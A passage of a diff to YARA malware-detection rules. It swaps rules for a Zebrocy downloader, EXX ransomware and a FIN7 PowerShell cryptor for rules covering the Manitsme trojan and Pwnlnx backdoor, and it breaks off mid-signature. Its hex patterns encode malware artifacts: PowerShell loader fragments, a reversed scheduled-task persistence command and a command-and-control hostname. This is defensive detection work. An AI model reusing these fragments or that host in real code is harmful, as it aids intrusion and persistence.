-		$c1 = { 49 6e 76 61 6c 69 64 20 70 61 72 74 69 74 69 6f 6e 20 74 61 62 6c 65 00 45 72 72 6f 72 20 6c 6f 61 64 69 6e 67 20 6f 70 65 72 61 74 69 6e 67 20 73 79 73 74 65 6d 00 4d 69 73 73 69 6e 67 20 6f 70 65 72 61 74 69 6e 67 20 73 79 73 74 65 6d 00 00 00 63 7b }
-		$c2 = { 52 90 4e 54 46 53 }
-		$c3 = { 41 20 64 69 73 6b 20 72 65 61 64 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 00 0d 0a 42 4f 4f 54 4d 47 52 20 69 73 20 63 6f 6d 70 72 65 73 73 65 64 00 0d 0a 50 72 65 73 73 20 43 74 72 6c 2b 41 6c 74 2b 44 65 6c 20 74 6f 20 72 65 73 74 61 72 74 }
-		$c4 = { 42 00 4f 00 4f 00 54 00 4d 00 47 00 52 00 04 00 24 00 49 00 33 00 30 }
-		$c5 = { 4e 00 54 00 4c 00 44 00 52 00 07 00 42 00 4f 00 4f 00 54 00 54 00 47 00 54 00 07 00 42 00 4f 00 4f 00 54 00 4e 00 58 00 54 }
-		$c6 = { 46 49 4c 45 30 00 03 00 8? ?d }
-		$c7 = { 24 00 56 00 6f 00 6c 00 75 00 6d 00 65 00 60 00 00 00 40 }
-		$s1 = { 46 61 73 74 4d 4d 20 42 6f 72 6c 61 6e 64 20 45 64 69 74 69 6f 6e 20 a9 20 32 30 30 34 2c 20 32 30 30 35 20 50 69 65 72 72 65 20 6c 65 20 52 69 63 68 65 20 2f 20 50 72 6f 66 65 73 73 69 6f 6e 61 6c 20 53 6f 66 74 77 61 72 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 }
-		$s2 = { 53 4f 46 54 57 41 52 45 5c 42 6f 72 6c 61 6e 64 5c 44 65 6c 70 68 69 5c 52 54 4c 00 46 50 55 4d 61 73 6b 56 61 6c 75 65 }
-		$s3 = { 53 59 53 54 45 4d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 43 6f 6e 74 72 6f 6c 5c 4b 65 79 62 6f 61 72 64 20 4c 61 79 6f 75 74 73 5c }
-		$s4 = { 53 79 73 74 65 6d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 43 6f 6e 74 72 6f 6c 5c 4b 65 79 62 6f 61 72 64 20 4c 61 79 6f 75 74 73 5c 25 2e 38 78 00 00 6c 61 79 6f 75 74 20 74 65 78 74 }
-		$s5 = { 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6e 00 67 00 20 00 74 00 6f 00 20 00 25 00 73 }
-		$s6 = { 52 00 65 00 73 00 6f 00 6c 00 76 00 69 00 6e 00 67 00 20 00 68 00 6f 00 73 00 74 00 6e 00 61 00 6d 00 65 00 20 00 25 00 73 }
-		$s7 = { 45 00 72 00 72 00 6f 00 72 00 20 00 72 00 65 00 61 00 64 00 69 00 6e 00 67 00 20 00 25 00 73 00 25 00 73 00 25 00 73 00 3a 00 20 00 25 00 73 00 11 00 53 00 74 00 72 00 65 00 61 00 6d 00 20 00 72 00 65 00 61 00 64 00 20 00 65 00 72 00 72 00 6f 00 72 }
-		$s8 = { 25 73 2c 20 43 6c 61 73 73 49 44 3a 20 25 73 }
-		$s9 = { 43 6f 6e 6e 65 63 74 4b 69 6e 64 b0 10 40 00 44 00 00 ff 44 00 00 ff 01 00 00 00 00 00 00 80 00 00 00 80 04 00 11 52 65 6d 6f 74 65 4d 61 63 68 69 6e 65 4e 61 6d 65 }
-		$s10 = { 22 20 4e 54 2f 20 [1-4] 20 4f 4d 2f 20 45 54 55 4e 49 4d 20 43 53 2f 20 65 74 61 65 72 43 2f 20 73 6b 73 61 74 68 63 73 }
-		$s11 = { 2f 2f 3a 70 74 74 68 }
+		$0 = {E4B5518CD941310A015E4AF8E5968C8231492FE19246A293A569D5D7A36F56EB2FC5B68FFF6F3359C19AF6806920C3FE6628F90A75440E6616297A031BA6075100D72DFAA9829E772E45D77B89F862081EAFDB19B4B2DCEF3F273FF645ACCEAA4B991F98373973C0FB25829E860D9BC195EF1A0AD9219456AD077D42868EE03EE00E88D04C434BA97E88DF99273A35E2C668A1C69954B4762390ABDFBE4CD4AF}
+		$1 = {90506F1C825F7AE0D8605F5C627CA325BFF199AB60A63DE8A90E923F4B18D7FB039E1DEC89D573AAB0A14C1D4BA70EB444753A41C03082A60CB4DB551393F2C50988A3181E7F31D01B5AAD94070432D98F18655AB8A555919FEFEA9DE1EDF1}
+		$2 = {D5EEF61336015A85FF04ED298A6BDD6742FF153E33DAF9B383A5FFDCE7E64D47748DB5FF2609DF9BD5C66735FF6916797B2D365313FF1461EAEB9DAEA754FF6D4D55D1956CC8CBFF75C10CE74BF88C8DFF3B553B839D42609FFF2916227230}
+		$3 = {6C750DDC932124500CE9B5AB91CE101BE9AD348220E9423124512282373675152281023428825C51770FE9841F853375125382F732750A5B83F60FEB6AEE2282647462228269745AEE22826F7452228275744AEE2282787442}
+		$4 = {19A8A063FFAAAF6C1E7F78A896FFFA5C8F30BA98B69CFF1961E107BEB7636AFF9EA56A4FC4EDE3F1FF295235ACD0185726FFADA6B8CB54B342C9FF86F58524DC91617BFFB4388DBE01B6CF86}
+		$5 = {50C449606B20184A6328556032197660AAF9507861609F6160640560B4546160C3A194056070C4A09EC4A01A0461A4C4A0831B16600561916069A291607061C09160AA1CB6204A}
+		$6 = {FFEB19D2636B8B95273156BB63E8C78470D55970F47CF26574B46DE86EE084704590CA8053F15320258BBD1AACF18B04F2E965C6605CB10880B7E8FCF53DF5EB0621635EFF}
+		$7 = {7E31126E14B8FF98554F6FCFB64207FFCF8D93B2573609C2FF99E4409F73BB9322FF1E5E380DC0BBABCAFF4B901EDF61BD6A68FFEE3253728C7769ABFF7BCDA939C959A282}
+		$8 = {1970FFC6F8AA7C32EE693CFF369579E5355EF62CFF682CEAF20BA3EA1CFF1AAC638666431B20FF54293D1E709C231AFFCD11B55599F64CB9FF1E5A9015DC867F}
+		$9 = {8DFF93B2573609C299E4FF409F73BB93221E5EFF380DC0BBABCA4B90FF1EDF61BD6A68EE32FF53728C7769AB7BCDFFA939C959A282D312FF5DD04F0370CE811F}
+		$10 = {DF5519064E31101CF3DA96C15FF96728B708F358F51759E3A22FFA1CF1BB986A2038D6753E6BF037945B8469ADF20BAB71E10F3DE27735F640704C970DFE8672}
 
 	condition:
-		uint16( 0 ) == 0x33c0 and filesize > 40KB and 5 of ( $c* ) and 8 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-
-rule ARKBIRD_SOLG_APT_APT28_Zebrocy_GO_Downloader_Nov_2020_1 : FILE
+rule TRELLIX_ARC_Apt_Manitsme_Trojan : TROJAN FILE
 {
 	meta:
-		description = "Detect Zebrocy Go downloader (November 2020)"
-		author = "Arkbird_SOLG"
-		id = "114c0297-7168-5d20-b56b-89b0b47f18c7"
-		date = "2020-12-09"
-		modified = "2020-12-10"
-		reference = "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-09/APT28/APT_APT28_Nov_2020_1.yar#L37-L65"
-		license_url = "N/A"
-		logic_hash = "e7b2e7c250f3a98127399176adf9f93b758f0a5111e126dd0a75a3fb95a48da9"
-		score = 50
-		quality = 61
-		tags = "FILE"
-		level = "experimental"
-		hash1 = "61c2e524dcc25a59d7f2fe7eff269865a3ed14d6b40e4fea33b3cd3f58c14f19"
-		hash2 = "f36a0ee7f4ec23765bb28fbfa734e402042278864e246a54b8c4db6f58275662"
+		description = "Rule to detect the Manitsme trojan"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "49e0c934-6920-5e49-837c-27ebbbd5a1a2"
+		date = "2013-03-08"
+		modified = "2020-08-14"
+		reference = "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_manitsme_trojan_pdb.yar#L1-L36"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		hash = "c1c0ea096ec4d36c1312171de2a9ebe258c588528a20dbb06a7e3cf97bf1e197"
+		logic_hash = "584053145249a930d3eae5e291d3553c57fa427dbecac9f04e7c0169f153b7af"
+		score = 75
+		quality = 70
+		tags = "TROJAN, FILE"
+		rule_version = "v1"
+		malware_type = "trojan"
+		malware_family = "Trojan:W32/Manitsme"
+		actor_type = "Apt"
+		actor_group = "Unknown"
 
 	strings:
-		$c1 = "os.(*ProcessState).sys" fullword ascii
-		$c2 = "os/exec.(*ExitError).Sys" fullword ascii
-		$c3 = "os/exec.ExitError.Sys" fullword ascii
-		$c4 = "os.(*ProcessState).Sys" fullword ascii
-		$p1 = "syscall.CreatePipe" fullword ascii
-		$p2 = "os.Pipe" fullword ascii
-		$p3 = { 6e 65 74 2f 68 74 74 70 2e 28 2a 68 74 74 70 32 70 69 70 65 29 2e 63 6c 6f 73 65 44 6f 6e 65 4c 6f 63 6b 65 64 }
-		$p4 = { 6e 65 74 2f 68 74 74 70 2e 28 2a 68 74 74 70 32 63 6c 69 65 6e 74 53 74 72 65 61 6d 29 2e 67 65 74 53 74 61 72 74 65 64 57 72 69 74 65 }
-		$op1 = { 75 5f 67 3d 25 73 20 25 71 25 73 2a 25 64 25 73 3d 25 73 26 23 33 34 3b 26 23 33 39 3b 26 61 6d 70 3b }
-		$op2 = { 70 63 3d 25 21 28 4e 4f 56 45 52 42 29 25 21 57 65 65 6b 64 61 79 28 25 73 7c 25 73 25 73 7c 25 73 28 42 41 44 49 4e 44 45 58 29 }
-		$op3 = { 48 54 54 50 5f 50 52 4f 58 59 48 6f 73 74 3a 20 25 73 0d 0a 49 50 20 61 64 64 72 65 73 73 4b 65 65 70 2d 41 6c 69 76 65 }
-		$op4 = { 63 6f 6e 6e 65 63 74 69 6f 6e 20 65 72 72 6f 72 3a 20 25 73 63 6f 6e 6e 65 63 74 69 6f 6e 20 74 69 6d 65 64 20 6f 75 74 }
-		$op5 = { 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 54 45 53 54 49 4e 47 20 4b 45 59 2d 2d 2d 2d 2d }
-		$op6 = { 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 54 45 53 54 49 4e 47 20 4b 45 59 2d 2d 2d 2d 2d }
+		$s1 = "SvcMain.dll" fullword ascii
+		$s2 = "rj.soft.misecure.com" fullword ascii
+		$s3 = "d:\\rouji\\SvcMain.pdb" fullword ascii
+		$s4 = "constructor or from DllMain." fullword ascii
+		$s5 = "Open File Error" fullword ascii
+		$s6 = "nRet == SOCKET_ERROR" fullword ascii
+		$s7 = "Oh,shit" fullword ascii
+		$s8 = "Paraing" fullword ascii
+		$s9 = "Hallelujah" fullword ascii
+		$s10 = "ComSpec" fullword ascii
+		$s11 = "ServiceMain" fullword ascii
+		$s12 = "SendTo(s,(char *)&sztop,sizeof(sztop),FILETYPE) == ERRTYPE" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x4d5a and filesize > 800KB and ( pe.imphash ( ) == "91802a615b3a5c4bcc05bc5f66a5b219" ) and 3 of ( $c* ) and 3 of ( $p* ) and 3 of ( $op* )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule ARKBIRD_SOLG_Ran_ELF_EXX_Nov_2020_1 : FILE
+rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_1 : BACKDOOR FILE
 {
 	meta:
-		description = "Detect EXX variant ELF ransomware"
-		author = "Arkbird_SOLG"
-		id = "fe85d480-317a-51c3-a817-fc9034e2944f"
-		date = "2020-12-09"
-		modified = "2020-12-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-09/EXX/Ran_ELF_EXX_Nov_2020_1.yar#L1-L28"
-		license_url = "N/A"
-		logic_hash = "4508a0cf79d0d85959009f59e1471cbf123fa24f5c21da5801e91ed0bbe8a085"
-		score = 50
-		quality = 73
-		tags = "FILE"
-		level = "experimental"
-		hash1 = "cb408d45762a628872fa782109e8fcfc3a5bf456074b007de21e9331bb3c5849"
+		description = "Rule to detect the backdoor pwnlnx variant 1"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "5b76ca62-460c-5c36-a239-700cc509f2b0"
+		date = "2020-04-17"
+		modified = "2020-08-14"
+		reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_decade_of_RATs.yar#L3-L33"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		hash = "0f6033d6f82ce758b576e2d8c483815e908e323d0b700040fbdab5593fb5282b"
+		logic_hash = "1487890494dde891a6dbe7dff7ebd5660ee01fe10220215e680115f168c2ae4a"
+		score = 75
+		quality = 70
+		tags = "BACKDOOR, FILE"
+		rule_version = "v1"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Pwnlnx"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
-		$dbg1 = { 55 6e 65 78 70 65 63 74 65 64 20 65 72 72 6f 72 2c 20 72 65 74 75 72 6e 20 63 6f 64 65 20 3d 20 25 30 38 58 0a }
-		$dbg2 = { 47 72 65 65 74 69 6e 67 73 20 [3-10] 21 }
-		$dbg3 = { 63 79 63 6c 65 73 3d 25 6c 75 20 72 61 74 69 6f 3d 25 6c 75 20 6d 69 6c 6c 69 73 65 63 73 3d 25 6c 75 20 73 65 63 73 3d 25 6c 75 20 68 61 72 64 66 61 69 6c 3d 25 64 20 61 3d 25 6c 75 20 62 3d 25 6c 75 0a }
-		$dbg4 = { 53 48 41 2d 25 64 20 74 65 73 74 20 23 25 64 3a }
-		$lib1 = "pthread_mutex_unlock@@GLIBC_2.2.5" fullword ascii
-		$lib2 = "pthread_mutex_lock@@GLIBC_2.2.5" fullword ascii
-		$lib3 = "mbedtls_rsa_import" fullword ascii
-		$lib4 = "mbedtls_rsa_export" fullword ascii
-		$lib5 = "mbedtls_oid_get_extended_key_usage" fullword ascii
-		$lib6 = "mbedtls_sha256_process" fullword ascii
-		$seq1 = { 48 83 ec 20 89 7d ec 48 89 75 e0 b8 00 00 00 00 e8 77 00 00 00 48 8d 45 f0 b9 00 00 00 00 48 8d 15 b5 ff ff ff be 00 00 00 00 48 89 c7 e8 d6 fb ff ff c7 45 fc 01 00 00 00 eb }
-		$seq2 = { 00 00 00 00 e8 b2 fe ff ff 48 8b 45 e8 48 89 c7 e8 92 ed ff ff 48 83 c0 01 48 89 c7 e8 c6 ee ff ff 48 89 45 f8 48 83 7d f8 00 74 3a 48 8b 55 e8 48 8b 45 f8 48 89 d6 48 89 c7 e8 f8 ec ff ff 48 8b 45 f8 48 89 c7 e8 12 fd ff ff 48 8b 45 f8 48 89 c7 e8 90 ec ff ff b8 00 00 00 00 e8 95 fc ff ff }
-		$seq3 = { e5 41 55 41 54 53 48 81 ec 18 18 00 00 c7 45 dc 00 00 00 00 48 c7 45 d0 00 00 00 00 bf 00 00 00 00 e8 13 fd ff ff 89 c7 e8 7c fc ff ff e8 d7 fd ff ff 41 89 c5 e8 cf fd ff ff 41 89 c4 e8 c7 fd ff ff 89 c3 e8 c0 fd ff ff 89 c2 48 8d 85 d0 e7 ff ff 4d 89 e9 4d 89 e0 48 89 d9 48 8d 35 bf 0a 02 00 48 89 }
+		$bp = { 7F??4C4602??01??000000000000000002??3E????0000????1A????0000000040000000000000??????0000000000000000000040??????????????1D????????0000????????????000000000000??????4000000000??????4000000000????01??00000000????01??00000000????000000000000????0000??????0000????000000000000????4000000000000002????000000001C??0000000000001C??00000000000001??00000000000001??000005????????0000000000000000??????0000000000004000000000????76??00000000????76??000000000000????00000000????0000????0000000080????00000000????????????0000????????????000038??00000000000080??????00000000000020??0000000002??0000060000????80????0000000028??????????000028??????????0000A0????????0000????????????0000????000000000000??????000004??00001C??0000000000001C??4000000000??????4000000000????000000000000????000000000000??????00000000000050E5??6404??00009C6D0000000000009C6D4000000000??????????????0000DC??000000000000DC??00000000000004??00000000000051E5??64??000000000000000000000000000000000000000000000000000000000000000000000000000000000000????000000000000????6C69????????????2D????????78??78??362D????????6F2E32??04??000010??000001??0000474E5500000000????0000????0000????000000000000????0000??????000001??000006000000000000????000020??0000??????00007D??5A580000000000000000000000000000000000000000000000000000000015????????00000000000000000000??????00000000000082????????00000000000000000000????????????0000????????????00000000000000000000????????????0000??????000012??0000000000000000000062??0000000000006A??000012??000000000000000000001B??0000000000007E??000012??000000000000000000008B??0000000000004902??????00000000000000000000????????????0000????????????00000000000000000000????????00000000??????000012??000000000000000000008E??000000000000F401??????00000000000000000000????????????0000????????????00000000000000000000????000000000000????01??????00000000000000000000????????????0000????0000????000000000000000000000000000000000000????0000????000000000000000000000000000000000000??????000012??0000000000000000000025????????0000????????????00000000000000000000????000000000000????0000????00000000000000000000????000000000000????01??????00000000000000000000????????????0000????0000????00000000000000000000????000000000000????02??????00000000000000000000????????????0000????01??????00000000000000000000??????0000000000006602??????00000000000000000000????????????0000??????000012??0000000000000000000025????????0000????01??????00000000000000000000????000000000000????????????00000000000000000000????000000000000????01??????00000000000000000000????000000000000????0000????00000000000000000000????01??00000000????????????00000000000000000000????????????0000????????????00000000000000000000??????000000000000EC01??????00000000000000000000??????0000000000004B01??????00000000000000000000????????????0000??????000012??0000000000000000000025????????0000????01??????00000000000000000000????????????0000??????000012??0000000000000000000008??0000000000004302??????00000000000000000000????????????0000??????????????000000000000000000000A??0000000000003F01??????00000000000000000000????????????0000??????000012??00000000000000000000F0????00000000????01??????00000000000000000000??????????????00002F02??????00000000000000000000????01??00000000????????????00000000000000000000????000000000000??????????????0000000000000000000080????00000000????02??????00000000000000000000????000000000000??????000012??0000000000000000000074??000000000000BF????????00000000000000000000????????????0000????02??????00000000000000000000??????000000000000FA0000????00000000000000000000????????????0000??????000012??0000000000000000000011??000000000000A8??000012??0000000000000000000044000000000000??????000012??000000000000000000005A000000000000??????000012??0000000000000000000029??000000000000C6????????00000000000000000000????000000000000????????????00000000000000000000????000000000000????0000????00000000000000000000????????00000000????????????00000000000000000000??????000000000000BC????????00000000000000000000????02??00000000????01??????00000000000000000000??????00000000000034??000012??00000000000000000000A1????????0000????????????00000000000000000000????????????0000??????????????000000000000000000004B000000000000????0000????00000000000000000000????000000000000??????000012??0000000000000000000005????????0000??????000012??0000000000000000000031??00000000000074??000012??00000000000000000000FF??0000000000005E02??????00000000000000000000????000000000000????????????00000000000000000000????????????0000??????000012??0000000000000000000025????????0000????02??????00000000000000000000??????000000000000DE??000012??000000000000000000007B??00000000000030??000012??0000000000000000000075??000000000000D9??000012??000000000000000000000E000000000000????????????00000000000000000000????000000000000????02??????00000000000000000000????????????0000????????????00000000000000000000????????????0000????????????00000000000000000000????000000000000????02??????00000000000000000000????000000000000????01??????00000000000000000000????????????0000????????????00000000000000000000????000000000000????????????00000000000000000000??????0000000000005201??????0000????174000000000????00000000000000005F5F676D6F6E5F73??6172??5F5F??????76??52656769????????????6173??6573??6C69????????????61642E????2E30??72??63????72??6D??????68????????5F63????6174????????6E6474????????75??65??????69??????????????6E6F5F6C6F63????69????????????6B????74??72??6164??73??676D6173????????6E6E6563??????74??72??6164??73??6C66??????63????74??70??68????????5F6465????63????6663????6C????????63??73??2E????????63????74??73??72??70????????69????????????????????616E64??????6574??6174??6E??????74??77??69??????????????6469????????????5F6E74??61??????74??72??69??????????????70??????????6D6F6E????????74??6E??????6C6563??????6B????????72??616C6C6F63??676574??69??????????????73??72??6F6B????63????77????????70??6173??72??3634??73??67656D70??79??6574??6D656D73??74??72??6469??????????????????6565??????68????????6173??74??6D65??????74??6F63????70????????616E74??74??6475??32??73??67616464????74??69????????????6472??6663??????65??????74??6F63????70????????6C6C6F63??73??72??6174??72??616C70??74????????6D6F76????????656E6469????????????6C??????74??6F73??62????616D65??????6563??????????72??74????????656164??????6C6F63????74??6C6F63????74??6D65??????616E6469????????????616464??????????????6565????73??74??69????????????????????6D6D6F76????????70??6E3634??5F5F6C69????????????72??5F6D6169????????????73??73??70??69????????????65????????78??74??74??34??474C4942435F32??32??35????????42435F32??33??000002??02??02??03??02??02??02??03??03??02??02??02??0000000002??02??02??02??02??03??02??02??02??02??02??02??02??02??03??02??02??02??04??02??02??03??02??03??02??02??02??03??02??02??02??02??02??03??02??02??02??02??02??02??03??02??02??03??02??02??02??03??02??03??02??03??02??02??02??02??02??02??03??03??03??02??02??02??02??02??000001??01??24??000010??000020??000075??69??????????9602??00000000????????????????????000000000000????69????????????A2????????0000??????69??????????9602??00000000????81????????????060000????????????000000000000????81????????????070000????00000000000000000000????81????????????070000????00000000000000000000????81????????????070000????00000000000000000000000082??????0000????0000??????0000000000000000000008??????????0000070000????????????000000000000????82??????0000????0000????00000000000000000000????82??????0000????0000????00000000000000000000????82??????0000????0000????00000000000000000000????82??????0000????0000????00000000000000000000????82??????0000????0000????00000000000000000000????82??????0000????0000????00000000000000000000??????6000000000????0000??????000000000000000000004882??????0000????0000????00000000000000000000??????6000000000????0000????00000000000000000000??????6000000000????0000????00000000000000000000??????6000000000????0000????00000000000000000000??????6000000000????0000????00000000000000000000??????6000000000????0000?????? }
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize > 80KB and 3 of ( $dbg* ) and 4 of ( $lib* ) and 2 of ( $seq* )
+		uint16( 0 ) == 0x457f and filesize < 100KB and all of them
 }
-rule ARKBIRD_SOLG_CRIM_FIN7_PS_Cryptor_Jun_2021_1 : FILE
+rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_2 : BACKDOOR FILE
 {
 	meta:
-		description = "Detect PS Cryptor used by FIN7 for Diceloader and Carbanak"
-		author = "Arkbird_SOLG"
-		id = "26361500-c33e-59c8-a53f-a881966c71a7"
-		date = "2021-06-07"
-		modified = "2021-06-07"
-		reference = "https://twitter.com/z0ul_/status/1401795117678219267"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-07/FIN7/CRIM_FIN7_PS_Cryptor_Jun_2021_1.yara#L1-L28"
-		license_url = "N/A"
-		logic_hash = "d7eadaa6dec75ecfa2f03860f41b39dbe9e7ffc9e6ad743497586356301ef67c"
+		description = "Rule to detect the backdoor pwnlnx variant 2"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "c4ee686b-49d9-5566-b749-1144a19c1fee"
+		date = "2020-04-17"
+		modified = "2020-08-14"
+		reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_decade_of_RATs.yar#L35-L65"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		hash = "08cc67002782cbafd97a4bff549d25dd72d6976d2fdf79339aaf5a3ff7c3107e"
+		logic_hash = "08ea40ba72677263a41f62097fc38040361ba595d67cb04979b66548c7f4d271"
 		score = 75
-		quality = 55
-		tags = "FILE"
-		hash1 = "944e47dc9da19b753beba173214cdebea2aa3651c402dfacae2dde82c4fdaa43"
-		hash2 = "fada67a9f89429d6c191cd6fef5d75cd7b49eebaa2e40d1dd1f9884b3038a23b"
-		hash3 = "0f083aac77fb734a8e81fb9dff218f0414ac6c4c9a23b2832837fbc2c7e2031d"
-		hash4 = "dc9442838b464e96281a32705c9b5958e4f45dbefd1ef4a885fac9898af0a4b7"
-		hash5 = "fad295cf65552061dc553c21d89d8bbd0b02783c01f5e696232df6a14381c206"
-		tlp = "White"
-		adversary = "FIN7"
+		quality = 70
+		tags = "BACKDOOR, FILE"
+		rule_version = "v1"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Pwnlnx"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
-		$s1 = { 3d 4e 65 77 2d 4f 62 6a 65 63 74 20 49 4f 2e 43 6f 6d 70 72 65 73 73 69 6f 6e 2e 44 65 66 6c 61 74 65 53 74 72 65 61 6d 28 5b 49 4f 2e 4d 65 6d 6f 72 79 53 74 72 65 61 6d 5d 5b 42 79 74 65 5b 5d [6-12] 5b 49 4f 2e 43 6f 6d 70 72 65 73 73 69 6f 6e 2e 43 6f 6d 70 72 65 73 73 69 6f 6e 4d 6f 64 65 5d 3a 3a 44 65 63 6f 6d 70 72 65 73 73 29 }
-		$s2 = { 40 28 5b 49 6e 74 50 74 72 5d 2c 5b 55 49 6e 74 33 32 5d 2c 5b 55 49 6e 74 33 32 5d 2c 5b 55 49 6e 74 33 32 5d 29 28 5b 49 6e 74 50 74 72 5d 29 }
-		$s3 = { 2c 20 24 6e 75 6c 6c 2c 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 43 61 6c 6c 69 6e 67 43 6f 6e 76 65 6e 74 69 6f 6e 73 5d 3a 3a 41 6e 79 2c 20 40 28 28 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 48 61 6e 64 6c 65 52 65 66 29 2e 47 65 74 54 79 70 65 28 29 2c 20 5b 73 74 72 69 6e 67 5d 29 2c 20 24 6e 75 6c 6c }
-		$s4 = { 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 47 65 74 44 65 6c 65 67 61 74 65 46 6f 72 46 75 6e 63 74 69 6f 6e 50 6f 69 6e 74 65 72 28 }
-		$s5 = { 2c 20 24 6e 75 6c 6c 2c 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 43 61 6c 6c 69 6e 67 43 6f 6e 76 65 6e 74 69 6f 6e 73 5d 3a 3a 41 6e 79 2c 20 40 28 5b 73 74 72 69 6e 67 5d 29 2c 20 24 6e 75 6c 6c 29 }
-		$s6 = { 5b 41 70 70 44 6f 6d 61 69 6e 5d 3a 3a 43 75 72 72 65 6e 74 44 6f 6d 61 69 6e 2e 47 65 74 41 73 73 65 6d 62 6c 69 65 73 28 29 20 7c 20 57 68 65 72 65 2d 4f 62 6a 65 63 74 20 7b 20 24 5f 2e 47 6c 6f 62 61 6c 41 73 73 65 6d 62 6c 79 43 61 63 68 65 20 2d 41 6e 64 20 24 5f 2e 4c 6f 63 61 74 69 6f 6e 2e 53 70 6c 69 74 28 27 5c 5c 27 29 5b 2d 31 5d 2e 45 71 75 61 6c 73 28 28 }
-		$s7 = { 2c 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 43 61 6c 6c 69 6e 67 43 6f 6e 76 65 6e 74 69 6f 6e 73 5d 3a 3a 53 74 61 6e 64 61 72 64 2c }
-		$s8 = { 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 48 61 6e 64 6c 65 52 65 66 5d 28 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 48 61 6e 64 6c 65 52 65 66 28 24 }
-		$s9 = { 3d 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 47 65 74 44 65 6c 65 67 61 74 65 46 6f 72 46 75 6e 63 74 69 6f 6e 50 6f 69 6e 74 65 72 28 24 }
-		$s10 = { 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 43 6f 70 79 28 24 }
-		$s11 = { 3d 5b 49 6e 74 50 74 72 5d 3a 3a 5a 65 72 6f }
+		$bp = { 7F??4C4602??01??000000000000000002??3E????0000000004??00000000??????00000000000088????????????00000000??????38??05????????????????0000????????????0000000000000000??????0000000000004000000000??????0D??????????????0D????????0000????00000000????0000????0000????????????0000????????????0000????????????0000????12??00000000????????????00000000????00000000??????000004??00005801??00000000??????4000000000??????4000000000????????00000000????????00000000??????000000000000070000??????000080??????0000000080??????0000000080??????0000000028??00000000000070??00000000000008??00000000000051E5??64??000000000000000000000000000000000000000000000000000000000000000000000000000000000000????000000000000??????000010??000001??0000474E5500000000????0000????0000????0000??????000014??000003??0000474E55????????????CC78??78??83????????????CB371F0000000080??????0000000025????????0000????7E??00000000????????????0000????????????0000??????4200000000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000??????4200000000????????????0000????????????0000??????4200000000????????????0000????????????0000????????????0000????76??00000000????????????0000????8B????00000000C8??????0000000025????????0000??????4200000000????76??00000000????????????0000????444200000000????76??00000000????????????0000??????4900000000????76??00000000????????????0000??????4600000000????76??00000000????????????0000????424200000000??????EC08??33??0000E8????????E